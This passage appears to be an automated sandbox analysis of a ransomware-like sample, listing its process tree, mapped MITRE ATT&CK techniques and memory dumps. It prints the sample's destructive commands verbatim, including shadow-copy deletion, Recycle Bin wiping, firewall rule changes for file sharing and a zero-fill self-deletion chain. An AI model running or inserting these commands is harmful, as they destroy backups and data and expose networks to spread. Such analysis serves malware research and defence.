- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1704
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3208
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3416
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4004
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2260
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\-Инструкция.txt
  2⤵
  PID:2076
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:3696
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2452
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
  2⤵
  PID:1508

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:1208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2120-187-0x00000000051A0000-0x00000000051A1000-memory.dmp

Filesize
4KB

Download
memory/2120-189-0x00000000079C0000-0x00000000079C1000-memory.dmp

Filesize
4KB

Download
memory/2120-208-0x00000000051A4000-0x00000000051A6000-memory.dmp

Filesize
8KB

Download
memory/2120-206-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/2120-196-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/2120-192-0x00000000083F0000-0x00000000083F1000-memory.dmp

Filesize
4KB

Download
memory/2120-193-0x0000000007B50000-0x0000000007B51000-memory.dmp

Filesize
4KB

Download
memory/2120-190-0x0000000007A60000-0x0000000007A61000-memory.dmp

Filesize
4KB

Download
memory/2120-183-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/2120-195-0x0000000008BC0000-0x0000000008BC1000-memory.dmp

Filesize
4KB

Download
memory/2120-184-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/2120-185-0x0000000004F40000-0x0000000004F41000-memory.dmp

Filesize
4KB

Download
memory/2120-207-0x00000000051A3000-0x00000000051A4000-memory.dmp

Filesize
4KB

Download
memory/2120-186-0x0000000007B70000-0x0000000007B71000-memory.dmp

Filesize
4KB

Download
memory/2120-188-0x00000000051A2000-0x00000000051A3000-memory.dmp

Filesize
4KB

Download
memory/2120-194-0x0000000008B70000-0x0000000008B71000-memory.dmp

Filesize
4KB

Download
memory/2732-210-0x0000000007D70000-0x0000000007D71000-memory.dmp

Filesize
4KB

Download
memory/2732-115-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2732-209-0x0000000008F60000-0x0000000008F61000-memory.dmp

Filesize
4KB

Download
memory/2732-118-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/2732-117-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download